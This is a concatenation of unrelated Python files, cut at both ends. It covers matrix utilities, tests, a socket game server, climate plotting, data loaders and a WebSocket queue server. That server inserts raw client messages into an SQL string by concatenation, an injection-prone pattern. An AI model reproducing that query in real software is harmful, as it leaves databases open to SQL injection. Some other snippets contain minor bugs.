dL_dK[j, k] -= dL_dK[i, j] * L[i, k]
for j in range(k + 1, N):
dL_dK[j, k] /= L[k, k]
dL_dK[k, k] -= L[j, k] * dL_dK[j, k]
dL_dK[k, k] /= (2 * L[k, k])
return dL_dK
def triang_to_cov(L):
return np.dstack([np.dot(L[:,:,i], L[:,:,i].T) for i in range(L.shape[-1])])
def multiple_dpotri(Ls):
return np.array([linalg.dpotri(np.asfortranarray(Ls[i]), lower=1)[0] for i in range(Ls.shape[0])])
def indexes_to_fix_for_low_rank(rank, size):
"""
Work out which indexes of the flatteneed array should be fixed if we want
the cholesky to represent a low rank matrix
"""
#first we'll work out what to keep, and the do the set difference.
#here are the indexes of the first column, which are the triangular numbers
n = np.arange(size)
triangulars = (n**2 + n) / 2
keep = []
for i in range(rank):
keep.append(triangulars[i:] + i)
#add the diagonal
keep.append(triangulars[1:]-1)
keep.append((size**2 + size)/2 -1)# the very last element
keep = np.hstack(keep)
return np.setdiff1d(np.arange((size**2+size)/2), keep)
if config.getboolean('cython', 'working'):
triang_to_flat = _triang_to_flat_cython
flat_to_triang = _flat_to_triang_cython
backprop_gradient = choleskies_cython.backprop_gradient_par_c
else:
backprop_gradient = _backprop_gradient_pure
triang_to_flat = _triang_to_flat_pure
flat_to_triang = _flat_to_triang_pure
|
import miniproxypool
import logging
import sys
import time
import requests
logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='[%(name)20.20s] [%(asctime)s] [%(levelname)7.7s] [%(threadName)10s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S',)
logging.getLogger('requests').setLevel(logging.WARNING) # suppress the logger from requests
logger = logging.getLogger(__name__)
if __name__ == '__main__':
miniproxypool.config.VALIDATOR_URL = "http://www.google.ca"
miniproxypool.config.VALIDATOR_TIMEOUT = 0.5 # seconds
miniproxypool.config.VALIDATOR_THREAD_POOL_SIZE = 20
miniproxypool.config.VALIDATOR_CONNECTIONS_PER_THREAD = 20
miniproxypool.config.VALIDATE_THREAD_RUN_PERIOD = 5 * 60 # seconds wait after each validation
miniproxypool.config.LOAD_PORXIES_FROM_RESOURCES_THREAD_RUN_PERIOD = 10 * 60 # seconds wait after each loading from sites
miniproxypool.run_as_daemon()
while(True):
print("There are %d valid proxies in the pool."%len(miniproxypool.get_all_proxies()))
time.sleep(60 * 10)
#print(miniproxypool.get_all_proxies())
|
from rpg.items.consumables import Consumable
class Food(Consumable):
config_filename = "consumables/food.yaml"
|
# server code for people to play on
import socket, threading
from queue import Queue
# sockets server famework based on framework from Rohan Varma and Kyle Chin
HOST = ""
PORT = 50003
BACKLOG = 4
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen(BACKLOG)
print("waiting for connection...")
def handleClient(client, serverChannel, cID, clientele):
client.setblocking(1)
msg = ""
while True:
try:
msg += client.recv(10).decode("UTF-8")
command = msg.split("\n")
while (len(command) > 1):
readyMsg = command[0]
msg = "\n".join(command[1:])
serverChannel.put(str(cID) + " " + readyMsg)
command = msg.split("\n")
except:
clientele.pop(cID)
return
def serverThread(clientele, serverChannel):
while True:
msg = serverChannel.get(True, None)
print("msg recv: ", msg)
msgList = msg.split(" ")
senderID = msgList[0]
instruction = msgList[1]
details = " ".join(msgList[2:])
if details != "":
for cID in clientele:
if cID != senderID:
sendMsg = senderID + " " + instruction + " " + details + "\n"
clientele[cID].send(sendMsg.encode())
print("> send to %s:" % cID, sendMsg[:-1])
print("senderID: " + senderID,
"instrunciton: " + instruction,
"details: " + details)
print()
serverChannel.task_done()
clientele = dict()
playerNum = 0
# instructions to be executed
serverChannel = Queue(100)
threading.Thread(target = serverThread, args = (clientele, serverChannel)).start()
names = ["Player1", "Player2", "Player3", "Player4"]
while True:
client, address = server.accept()
#myID cleint key in client dictionary
myID = names[playerNum]
print(myID, playerNum)
for cID in clientele:
print(repr(cID), repr(playerNum))
clientele[cID].send(("newPlayer %s\n" % myID).encode())
client.send(("newPlayer %s\n" % cID).encode())
clientele[myID] = client
client.send(("myIDis %s \n" % myID).encode())
print("connection recieved from %s" % myID)
threading.Thread(target = handleClient,
args = (client, serverChannel, myID, clientele)).start()
playerNum += 1
|
import random
from base import BaseMatcher
class VolunteerMatcher(BaseMatcher):
all_text = "volunteer someone"
all_text_other = "volunteer someone else"
dev_text = "volunteer a dev"
dev_text_other = "volunteer another dev"
dev_candidates = ['sjl', 'arthurdebert', 'honza', 'fernandotakai', 'nicksergeant']
all_candidates = dev_candidates + ['cz', 'ehazlett']
def choose(self, message, user):
victim = None
if self.dev_text_other in message.lower():
while (not victim) or victim == user:
victim = random.choice(self.dev_candidates)
return victim
if self.dev_text in message.lower():
return random.choice(self.dev_candidates)
if self.all_text_other in message.lower():
while (not victim) or victim == user:
victim = random.choice(self.all_candidates)
return victim
if self.all_text in message.lower():
return random.choice(self.all_candidates)
def respond(self, message, user=None):
victim = self.choose(message, user)
if victim:
self.speak('%s is it' % victim)
|
testinfra_hosts = ['clients']
def test_correct_package_versions_are_installed(host):
v = host.ansible.get_variables()
indy_cli = host.package('indy-cli')
assert indy_cli.is_installed
assert indy_cli.version == v['indy_cli_ver']
libindy = host.package('libindy')
assert libindy.is_installed
if v['indy_cli_libindy_ver'] is not None:
assert libindy.version == v['indy_cli_libindy_ver']
def test_indy_cli_is_available_in_path(host):
assert host.exists('indy-cli')
|
#!/usr/bin/env python
import readingapi
import argparse
# Arguement parser
parser = argparse.ArgumentParser(description='Summarize reading list data.')
parser.add_argument('-g', '--graph', action="store_true", help='Produces a graph for each year.')
parser.add_argument('-y', '--year', help='A year or comma-separated list of years')
args = parser.parse_args()
# list, summary
if args.command == "list":
pass
elif args.command == "summary":
pass
|
import numpy as np
from sklearn.metrics import adjusted_rand_score as sklearn_ari
from clustermatch.sklearn.metrics import (
adjusted_rand_index,
get_contingency_matrix,
get_pair_confusion_matrix,
)
def test_get_contingency_matrix_k0_equal_k1():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([0, 1, 0, 2, 1, 2])
expected_mat = np.array([[1, 1, 0], [1, 0, 1], [0, 1, 1]])
observed_mat = get_contingency_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_contingency_matrix_k0_greater_k1():
part0 = np.array([0, 0, 1, 1, 2, 2, 3, 3, 3])
part1 = np.array([0, 1, 0, 2, 1, 2, 2, 2, 2])
expected_mat = np.array([[1, 1, 0], [1, 0, 1], [0, 1, 1], [0, 0, 3]])
observed_mat = get_contingency_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_contingency_matrix_k0_lesser_k1():
part0 = np.array([0, 0, 1, 1, 2, 2, 3, 3, 3, 2, 2, 2, 1])
part1 = np.array([0, 1, 0, 2, 1, 2, 3, 3, 3, 4, 4, 5, 5])
expected_mat = np.array(
[[1, 1, 0, 0, 0, 0], [1, 0, 1, 0, 0, 1], [0, 1, 1, 0, 2, 1], [0, 0, 0, 3, 0, 0]]
)
observed_mat = get_contingency_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_pair_confusion_matrix_k0_equal_k1():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([0, 1, 0, 2, 1, 2])
expected_mat = np.array([[18, 6], [6, 0]])
observed_mat = get_pair_confusion_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_pair_confusion_matrix_k0_greater_k1():
part0 = np.array([0, 0, 1, 1, 2, 2, 3, 3, 3])
part1 = np.array([0, 1, 0, 2, 1, 2, 2, 2, 2])
expected_mat = np.array([[42, 18], [6, 6]])
observed_mat = get_pair_confusion_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_adjusted_rand_index_manual_random_partitions_same_k():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([0, 1, 0, 2, 1, 2])
expected_ari = -0.25
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
def test_adjusted_rand_index_manual_perfect_match():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([2, 2, 3, 3, 4, 4])
expected_ari = 1.0
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
def test_adjusted_rand_index_random_partitions_same_k():
maxk0 = 2
maxk1 = maxk0
n = 100
part0 = np.random.randint(0, maxk0 + 1, n)
part1 = np.random.randint(0, maxk1 + 1, n)
# warning: the sklearn's ari implementation can overflow in older versions
# when n is large
expected_ari = sklearn_ari(part0, part1)
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
def test_adjusted_rand_index_random_partitions_k0_greater_k1():
maxk0 = 5
maxk1 = 3
n = 100
part0 = np.random.randint(0, maxk0 + 1, n)
part1 = np.random.randint(0, maxk1 + 1, n)
# warning: the sklearn's ari implementation can overflow in older versions
# when n is large
expected_ari = sklearn_ari(part0, part1)
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
|
"""
Constants.
Constants for feeds and feed entries.
"""
ATTR_ALERT = "alert"
ATTR_ATTRIBUTION = "attribution"
ATTR_CATEGORY = "category"
ATTR_DESCRIPTION = "description"
ATTR_ID = "id"
ATTR_GUID = "guid"
ATTR_MAG = "mag"
ATTR_PLACE = "place"
ATTR_PUB_DATE = "pubDate"
ATTR_STATUS = "status"
ATTR_TIME = "time"
ATTR_TITLE = "title"
ATTR_TYPE = "type"
ATTR_UPDATED = "updated"
FILTER_CATEGORIES = "categories"
FILTER_MINIMUM_MAGNITUDE = "minimum_magnitude"
FILTER_RADIUS = "radius"
HTTP_ACCEPT_ENCODING_HEADER = {"Accept-Encoding": "deflate, gzip"}
|
#!/usr/bin/python
import json
from ansible.module_utils.basic import AnsibleModule
def main():
fields = {
"project": {"required": True, "type": "str"},
"repository": {"required": True, "type": "str"},
"image_id": {"required": True, "type": "str"},
"state": {
"default": "present",
"choices": ["present", "absent"],
"type": "str",
},
}
module = AnsibleModule(argument_spec=fields)
module.exit_json(changed=True, meta=json.dumps(module.params))
if __name__ == "__main__":
main()
|
'''
Main entry
'''
from __future__ import absolute_import
import argparse
from py_template.modules.manager import Manager
def menu():
'''
The Menu is here
'''
parser = argparse.ArgumentParser(
description='py_template')
parser.add_argument('-o',
action="store",
dest="output",
help='location to put README.md')
parser.add_argument('-p',
action="store",
dest="path",
help='base path to scan files')
parser.add_argument('-e',
action="store_true",
dest="execute",
default=False,
help='execute the values')
parser.add_argument('-x',
action="store_true",
dest="example",
default=False,
help='Only output info with examples')
parser.add_argument('--version',
action='version',
version='%(prog)s 1.0')
return parser.parse_args()
def main():
'''
This is used in the cli and from a couple places
'''
options = menu()
if options.execute:
m1 = Manager(options)
if __name__ == '__main__':
main()
|
"""
Plot comparisons between SIT and SIC modeling experiments using
WACCM4. Subplot includes FIT, HIT, FICT. Composites are
organized by QBO-E - QBO-W
Notes
-----
Author : Zachary Labe
Date : 31 January 2018
"""
### Import modules
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
import nclcmaps as ncm
import datetime
import read_MonthlyOutput as MO
import calc_Utilities as UT
import cmocean
### Define directories
directorydata = '/surtsey/zlabe/simu/'
directoryfigure = '/home/zlabe/Desktop/'
#directoryfigure = '/home/zlabe/Documents/Research/SITperturb/Figures/'
### Define time
now = datetime.datetime.now()
currentmn = str(now.month)
currentdy = str(now.day)
currentyr = str(now.year)
currenttime = currentmn + '_' + currentdy + '_' + currentyr
titletime = currentmn + '/' + currentdy + '/' + currentyr
print('\n' '----Plotting QBO comparisons - %s----' % titletime)
### Alott time series
year1 = 1900
year2 = 2000
years = np.arange(year1,year2+1,1)
### Call arguments
varnames = ['Z500','Z30','SLP','T2M','U10','U300','SWE','THICK','P','EGR']
runnames = [r'HIT',r'FIT',r'FICT']
experiments = [r'\textbf{FIT--HIT}',r'\textbf{FICT--HIT}']
qbophase = ['pos','non','neg']
period = 'DJF'
for v in range(len(varnames)):
### Call function for surface temperature data from reach run
lat,lon,time,lev,tashit = MO.readExperi(directorydata,
'%s' % varnames[v],'HIT','surface')
lat,lon,time,lev,tasfit = MO.readExperi(directorydata,
'%s' % varnames[v],'FIT','surface')
lat,lon,time,lev,tasfict = MO.readExperi(directorydata,
'%s' % varnames[v],'FICT','surface')
### Create 2d array of latitude and longitude
lon2,lat2 = np.meshgrid(lon,lat)
### Read in QBO phases
filenamefitp = directorydata + 'FIT/monthly/QBO_%s_FIT.txt' % qbophase[0]
filenamefitno = directorydata + 'FIT/monthly/QBO_%s_FIT.txt' % qbophase[1]
filenamefitn = directorydata + 'FIT/monthly/QBO_%s_FIT.txt' % qbophase[2]
pos_fit = np.genfromtxt(filenamefitp,unpack=True,usecols=[0],dtype='int')
non_fit = np.genfromtxt(filenamefitno,unpack=True,usecols=[0],dtype='int')
neg_fit = np.genfromtxt(filenamefitn,unpack=True,usecols=[0],dtype='int')
filenamehitp = directorydata + 'HIT/monthly/QBO_%s_HIT.txt' % qbophase[0]
filenamehitno = directorydata + 'HIT/monthly/QBO_%s_HIT.txt' % qbophase[1]
filenamehitn = directorydata + 'HIT/monthly/QBO_%s_HIT.txt' % qbophase[2]
pos_hit = np.genfromtxt(filenamehitp,unpack=True,usecols=[0],dtype='int')
non_hit = np.genfromtxt(filenamehitno,unpack=True,usecols=[0],dtype='int')
neg_hit = np.genfromtxt(filenamehitn,unpack=True,usecols=[0],dtype='int')
filenamefictp = directorydata + 'FICT/monthly/QBO_%s_FICT.txt' % qbophase[0]
filenamefictno = directorydata + 'FICT/monthly/QBO_%s_FICT.txt' % qbophase[1]
filenamefictn = directorydata + 'FICT/monthly/QBO_%s_FICT.txt' % qbophase[2]
pos_fict = np.genfromtxt(filenamefictp,unpack=True,usecols=[0],dtype='int')
non_fict = np.genfromtxt(filenamefictno,unpack=True,usecols=[0],dtype='int')
neg_fict = np.genfromtxt(filenamefictn,unpack=True,usecols=[0],dtype='int')
### Concatonate runs
runs = [tashit,tasfit,tasfict]
### Separate per periods (ON,DJ,FM)
if period == 'ON':
tas_mo = np.empty((3,tashit.shape[0],tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i] = np.nanmean(runs[i][:,9:11,:,:],axis=1)
elif period == 'DJ':
tas_mo = np.empty((3,tashit.shape[0]-1,tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i],tas_mo[i] = UT.calcDecJan(runs[i],runs[i],lat,
lon,'surface',1)
elif period == 'FM':
tas_mo= np.empty((3,tashit.shape[0],tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i] = np.nanmean(runs[i][:,1:3,:,:],axis=1)
elif period == 'DJF':
tas_mo= np.empty((3,tashit.shape[0]-1,tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i],tas_mo[i] = UT.calcDecJanFeb(runs[i],runs[i],lat,
lon,'surface',1)
elif period == 'M':
tas_mo= np.empty((3,tashit.shape[0],tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i] = runs[i][:,2,:,:]
else:
ValueError('Wrong period selected! (ON,DJ,FM)')
### Composite by QBO phase
tas_mofitpos = tas_mo[1][pos_fit,:,:]
tas_mohitpos = tas_mo[0][pos_hit,:,:]
tas_mofictpos = tas_mo[2][pos_fict,:,:]
tas_mofitnon = tas_mo[1][non_fit,:,:]
tas_mohitnon = tas_mo[0][non_hit,:,:]
tas_mofictnon = tas_mo[2][non_fict,:,:]
tas_mofitneg = tas_mo[1][neg_fit,:,:]
tas_mohitneg = tas_mo[0][neg_hit,:,:]
tas_mofictneg = tas_mo[2][neg_fict,:,:]
### Compute climatology
climofitpos = np.nanmean(tas_mofitpos,axis=0)
climohitpos = np.nanmean(tas_mohitpos,axis=0)
climofictpos = np.nanmean(tas_mofictpos,axis=0)
climofitnon = np.nanmean(tas_mofitnon,axis=0)
climohitnon = np.nanmean(tas_mohitnon,axis=0)
climofictnon = np.nanmean(tas_mofictnon,axis=0)
climofitneg = np.nanmean(tas_mofitneg,axis=0)
climohitneg = np.nanmean(tas_mohitneg,axis=0)
climofictneg = np.nanmean(tas_mofictneg,axis=0)
climo = [climohitpos,climohitnon,climohitneg,
climohitpos,climohitnon,climohitneg]
### Compute comparisons for months - taken ensemble average
fithit = np.nanmean((tas_mofitneg-tas_mohitneg) - (tas_mofitpos[:32]-tas_mohitpos[:32]),axis=0)
ficthit = np.nanmean((tas_mofictneg-tas_mohitneg) - (tas_mofictpos[:32]-tas_mohitpos[:32]),axis=0)
diffruns_mo = [fithit,ficthit]
### Calculate significance for FM
stat_FITHIT,pvalue_FITHIT = UT.calc_indttest(tas_mofitneg-tas_mohitneg,tas_mofitpos[:32]-tas_mohitpos[:32])
stat_FICTHIT,pvalue_FICTHIT = UT.calc_indttest(tas_mofictneg-tas_mohitneg,tas_mofictpos[:32]-tas_mohitpos[:32])
pruns_mo = [pvalue_FITHIT,pvalue_FICTHIT]
###########################################################################
###########################################################################
###########################################################################
### Plot variable data for QBO composites
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
### Set limits for contours and colorbars
if varnames[v] == 'T2M':
limit = np.arange(-10,10.1,0.5)
barlim = np.arange(-10,11,5)
elif varnames[v] == 'Z500':
limit = np.arange(-60,60.1,1)
barlim = np.arange(-60,61,30)
elif varnames[v] == 'Z30':
limit = np.arange(-100,100.1,5)
barlim = np.arange(-100,101,50)
elif varnames[v] == 'SLP':
limit = np.arange(-6,6.1,0.5)
barlim = np.arange(-6,7,3)
elif varnames[v] == 'U10' or varnames[v] == 'U300':
limit = np.arange(-10,10.1,1)
barlim = np.arange(-10,11,5)
elif varnames[v] == 'SWE':
limit = np.arange(-25,25.1,1)
barlim = np.arange(-25,26,25)
elif varnames[v] == 'P':
limit = np.arange(-2,2.1,0.05)
barlim = np.arange(-2,3,1)
elif varnames[v] == 'THICK':
limit = np.arange(-60,60.1,3)
barlim = np.arange(-60,61,30)
elif varnames[v] == 'EGR':
limit = np.arange(-0.2,0.21,0.02)
barlim = np.arange(-0.2,0.3,0.2)
fig = plt.figure()
for i in range(len(diffruns_mo)):
var = diffruns_mo[i]
pvar = pruns_mo[i]
ax1 = plt.subplot(1,2,i+1)
m = Basemap(projection='ortho',lon_0=0,lat_0=89,resolution='l',
area_thresh=10000.)
var, lons_cyclic = addcyclic(var, lon)
var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lat)
x, y = m(lon2d, lat2d)
pvar,lons_cyclic = addcyclic(pvar, lon)
pvar,lons_cyclic = shiftgrid(180.,pvar,lons_cyclic,start=False)
climoq,lons_cyclic = addcyclic(climo[i], lon)
climoq,lons_cyclic = shiftgrid(180.,climoq,lons_cyclic,start=False)
m.drawmapboundary(fill_color='white',color='dimgray',linewidth=0.7)
cs = m.contourf(x,y,var,limit,extend='both')
cs1 = m.contourf(x,y,pvar,colors='None',hatches=['....'],
linewidths=0.4)
if varnames[v] == 'Z30': # the interval is 250 m
cs2 = m.contour(x,y,climoq,np.arange(21900,23500,250),
colors='k',linewidths=1.5,zorder=10)
m.drawcoastlines(color='dimgray',linewidth=0.8)
if varnames[v] == 'T2M':
cmap = ncm.cmap('NCV_blu_red')
cs.set_cmap(cmap)
elif varnames[v] == 'Z500':
cmap = ncm.cmap('nrl_sirkes')
cs.set_cmap(cmap)
elif varnames[v] == 'Z30':
cmap = ncm.cmap('nrl_sirkes')
cs.set_cmap(cmap)
elif varnames[v] == 'SLP':
cmap = ncm.cmap('nrl_sirkes')
cs.set_cmap(cmap)
elif varnames[v] == 'U10' or varnames[v] == 'U300':
cmap = ncm.cmap('temp_diff_18lev')
cs.set_cmap(cmap)
cs.set_cmap(cmap)
elif varnames[v] == 'SWE':
cmap = cmap = cmocean.cm.balance
cs.set_cmap(cmap)
elif varnames[v] == 'P':
cmap = ncm.cmap('precip4_diff_19lev')
cs.set_cmap(cmap)
elif varnames[v] == 'THICK':
cmap = ncm.cmap('NCV_blu_red')
cs.set_cmap(cmap)
elif varnames[v] == 'EGR':
cmap = cmocean.cm.curl
cs.set_cmap(cmap)
### Add experiment text to subplot
ax1.annotate(r'%s' % experiments[i],xy=(0,0),xytext=(0.5,1.05),
textcoords='axes fraction',color='dimgrey',
fontsize=23,rotation=0,ha='center',va='center')
###########################################################################
cbar_ax = fig.add_axes([0.312,0.15,0.4,0.03])
cbar = fig.colorbar(cs,cax=cbar_ax,orientation='horizontal',
extend='max',extendfrac=0.07,drawedges=False)
if varnames[v] == 'T2M':
cbar.set_label(r'\textbf{$^\circ$C}',fontsize=11,color='dimgray')
elif varnames[v] == 'Z500':
cbar.set_label(r'\textbf{m}',fontsize=11,color='dimgray')
elif varnames[v] == 'Z30':
cbar.set_label(r'\textbf{m}',fontsize=11,color='dimgray')
elif varnames[v] == 'SLP':
cbar.set_label(r'\textbf{hPa}',fontsize=11,color='dimgray')
elif varnames[v] == 'U10' or varnames[v] == 'U300':
cbar.set_label(r'\textbf{m/s}',fontsize=11,color='dimgray')
elif varnames[v] == 'SWE':
cbar.set_label(r'\textbf{mm}',fontsize=11,color='dimgray')
elif varnames[v] == 'P':
cbar.set_label(r'\textbf{mm/day}',fontsize=11,color='dimgray')
elif varnames[v] == 'THICK':
cbar.set_label(r'\textbf{m}',fontsize=11,color='dimgray')
elif varnames[v] == 'EGR':
cbar.set_label(r'\textbf{1/day}',fontsize=11,color='dimgray')
cbar.set_ticks(barlim)
cbar.set_ticklabels(list(map(str,barlim)))
cbar.ax.tick_params(axis='x', size=.01)
cbar.outline.set_edgecolor('dimgrey')
plt.subplots_adjust(wspace=0.01)
plt.subplots_adjust(hspace=0.01)
plt.subplots_adjust(bottom=0.15)
plt.savefig(directoryfigure + '/QBO_%s/QBOExperiments_E-W_%s_%s.png' % (period,
period,
varnames[v]),
dpi=300)
print('Completed: Script done!')
|
# ___declarations in `utilities.py`___
# do update in `utilities.py` if you do any change
#_________________________________________________________________________
import fileinput
from contextlib import contextmanager
@contextmanager
def line_bind(line, *ctors, splitter=lambda l: l.split(' '), do=None):
'''
Split `line` argument producing an iterable of mapped elements, in the sense of `ctors`.
Keyword argument `splitter` splits the given `line` respect `space` (' ')
character; however, it is possible to provide the desired behavior providing
a custom lambda expression of one parameter, eventually instantiated with `line`.
The iterable produced by `splitter` should match argument `ctors` in length;
if this holds, an iterable of mapped elements is produced, composed of elements
built by application of each function in `ctors` to element in the split, pairwise.
On the other hand, mapping happens according to the rules of `zip` if lengths differ.
Keyword argument `do` is an higher order operator, defaults to `None`: if
given, it should be a function that receive the generator, which is returned, otherwise.
Moreover, the returned iterable object is a generator, so a linear scan of the line
*is not* performed, hence there is no need to consume an higher order operator to
be applied during the scan, this provide good performances at the same time.
'''
g = (c(v) for c, v in zip(ctors, splitter(line)))
yield do(g) if do else g
@contextmanager
def stdin_input(getter=lambda: fileinput.input(), raw_iter=False):
'''
Produces a way to fetch lines by a source.
Keyword argument `getter` should be a thunk that produces an iterable, call it `i`;
by default, it produces the iterator which reads from standard input.
Keyword argument `raw_iter` is a boolean. If it is `True`, that iterator `i` is
returned as it is; otherwise, a thunk is returned which wraps the application `next(i)`.
'''
iterable = getter()
yield iterable if raw_iter else (lambda: next(iterable))
def forever_read_until_event(doer, reader=lambda: stdin_input(), event=StopIteration):
'''
Runs forever a `doer` function reading a source, until an event happens.
An iterable, provided by the `reader` thunk, is read infinitely until `event`
is raised. By defaults, `reader` reads from standard input and `event` is `StopIteration`.
'''
with reader() as f:
while True:
try: doer(f)
except event: break
#________________________________________________________________________
def python_code(*objs, markdown=True, remove_comments=False, docstring_delimiter=r'"""'):
import inspect
def cleaner(obj):
src = inspect.getsource(obj)
if remove_comments and inspect.getdoc(obj):
# the followoing could be done more clearly using regex, but for now...
start = src.index(docstring_delimiter, 0)
end = src.index(docstring_delimiter, start+len(docstring_delimiter))
removing_src = list(src)
del removing_src[start:end+len(docstring_delimiter)]
src = "".join(removing_src)
return src
src = "\n".join(map(cleaner, objs))
if markdown:
from IPython.display import Markdown
src = Markdown('```python\n{0}\n```'.format(src))
return src
#________________________________________________________________________
|
#!/usr/bin/env python
import sys
import sqlite3
import threading
import json
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
if (sys.version_info > (3, 0)):
import configparser
config = configparser.ConfigParser()
config.read('config.txt')
else:
import ConfigParser
config = ConfigParser.ConfigParser()
config.read(r'config.txt')
delay = config.get("config", "delay")
socketserver = config.get("config", "server")
socketport = config.get("config", "port")
clients = []
class teraWebSocket(WebSocket):
def handleMessage(self):
sockdata = json.loads(self.data)
conn = sqlite3.connect('antrean.db')
cur = conn.cursor()
if "reset" in sockdata:
cur.execute("UPDATE SQLITE_SEQUENCE SET SEQ= 0 WHERE NAME='antrean'") #reset sequence
conn.commit() #delete data
cur.execute("delete from antrean")
conn.commit()
else:
#accept data antrean
cur.execute("INSERT INTO antrean(data) VALUES('" + self.data + "')")
conn.commit()
conn.close()
def handleConnected(self):
clients.append(self)
def handleClose(self):
clients.remove(self)
# broadcast message every n seconds defined in config (delay)
def loops():
conn = sqlite3.connect('antrean.db')
conn.row_factory = sqlite3.Row
cur = conn.cursor()
cur.execute("select count(*) from antrean")
cnt = cur.fetchone()[0]
if int(cnt) > 0:
cur.execute("select id, data from antrean order by id asc limit 1")
data = cur.fetchone()
#broadcast
for client in clients:
client.sendMessage(data['data'])
#delete current data
cur.execute("delete from antrean where id=" + str(data['id']))
conn.commit()
conn.close()
threading.Timer(int(delay), loops).start()
loops()
server = SimpleWebSocketServer(socketserver, socketport, teraWebSocket)
server.serveforever()
|
from typing import List
from entities.word_evaluation import WordEvaluation
class WordNeighbourhoodStats:
def __init__(
self,
target_word: str,
neighbourhoods: List[List[WordEvaluation]]):
self._target_word = target_word
self._neighbourhoods = neighbourhoods
self._overlapping_words = self._calculate_overlaps()
def _calculate_overlaps(self) -> List[str]:
if self.neighbourhoods_amount < 2:
return []
overlaps = set(self._neighbourhoods[0])
for neighbourhood in self._neighbourhoods[1:]:
overlaps = overlaps & set(neighbourhood)
result = len(overlaps)
return result
def add_neighbourhood(self, neighbourhood: List[WordEvaluation]):
self._neighbourhoods.append(neighbourhood)
self._overlapping_words = self._calculate_overlaps()
def get_all_embeddings(self) -> List[List[float]]:
result = []
for i, neighbourhood in enumerate(self._neighbourhoods):
for word_evaluation in neighbourhood:
result.append(word_evaluation.get_embeddings(i))
return result
def get_all_words(self) -> List[str]:
result = []
for neighbourhood in self._neighbourhoods:
for word_evaluation in neighbourhood:
result.append(word_evaluation.word)
return result
@property
def target_word(self) -> str:
return self._target_word
@property
def overlaps_amount(self) -> int:
return self._overlapping_words
@property
def neighbourhoods_amount(self) -> int:
return len(self._neighbourhoods)
@property
def neighbourhood_size(self) -> int:
return len(self._neighbourhoods[0])
|
from misc import util
from collections import namedtuple
import numpy as np
import os
from PIL import Image
import sys
import json
import scipy
import gflags
FLAGS = gflags.FLAGS
USE_IMAGES = False
#N_EX = 6
N_EX = 4
sw_path = os.path.join(sys.path[0], "data/shapeworld")
Fold = namedtuple("Fold", ["hints", "examples", "inputs", "labels"])
Datum = namedtuple("Datum", ["hint", "ex_inputs", "input", "label"])
VisDatum = namedtuple("VisDatum", ["hint", "ex_inputs", "input", "label", "vis_ex_inputs", "vis_input"])
START = "<s>"
STOP = "</s>"
random = util.next_random()
class ShapeworldTask():
def __init__(self):
self.hint_vocab = util.Index()
self.feature_index = util.Index()
self.START = START
self.STOP = STOP
#with open(os.path.join(sw_path, "train", "examples.struct.json")) as feature_f:
# feature_data = json.load(feature_f)
# for datum in feature_data:
# for example in datum:
# for feature in example:
# self.feature_index.index(tuple(feature))
data = {}
for fold in ("train", "val", "test", "val_same", "test_same"):
examples = np.load(os.path.join(sw_path, fold, "examples.npy"))
inputs = np.load(os.path.join(sw_path, fold, "inputs.npy"))
labels = np.load(os.path.join(sw_path, fold, "labels.npy"))
with open(os.path.join(sw_path, fold, "hints.json")) as hint_f:
hints = json.load(hint_f)
#new_hints = []
#for hint in hints:
# hint = hint.split()
# new_hint = []
# for i in range(len(hint) - 1):
# new_hint.append(hint[i] + "/" + hint[i+1])
# new_hints.append(" ".join(new_hint))
#hints = new_hints
indexed_hints = []
for hint in hints:
hint = [START] + hint.split() + [STOP]
indexed_hint = [self.hint_vocab.index(w) for w in hint]
indexed_hints.append(indexed_hint)
hints = indexed_hints
#ex_features = np.zeros((examples.shape[0], examples.shape[1], len(self.feature_index)))
#inp_features = np.zeros((examples.shape[0], len(self.feature_index)))
#with open(os.path.join(sw_path, fold, "examples.struct.json")) as ex_struct_f:
# examples_struct = json.load(ex_struct_f)
# for i_datum, expls in enumerate(examples_struct):
# for i_ex, example in enumerate(expls):
# for feature in example:
# i_feat = self.feature_index[tuple(feature)]
# if i_feat:
# ex_features[i_datum, i_ex, i_feat] = 1
#with open(os.path.join(sw_path, fold, "inputs.struct.json")) as in_struct_f:
# inputs_struct = json.load(in_struct_f)
# for i_datum, example in enumerate(inputs_struct):
# for feature in example:
# i_feat = self.feature_index[tuple(feature)]
# if i_feat is not None:
# inp_features[i_datum, i_feat] = 1
ex_features = np.load(os.path.join(sw_path, fold, "examples.feats.npy"))
inp_features = np.load(os.path.join(sw_path, fold, "inputs.feats.npy"))
fold_data = []
for i in range(len(hints)):
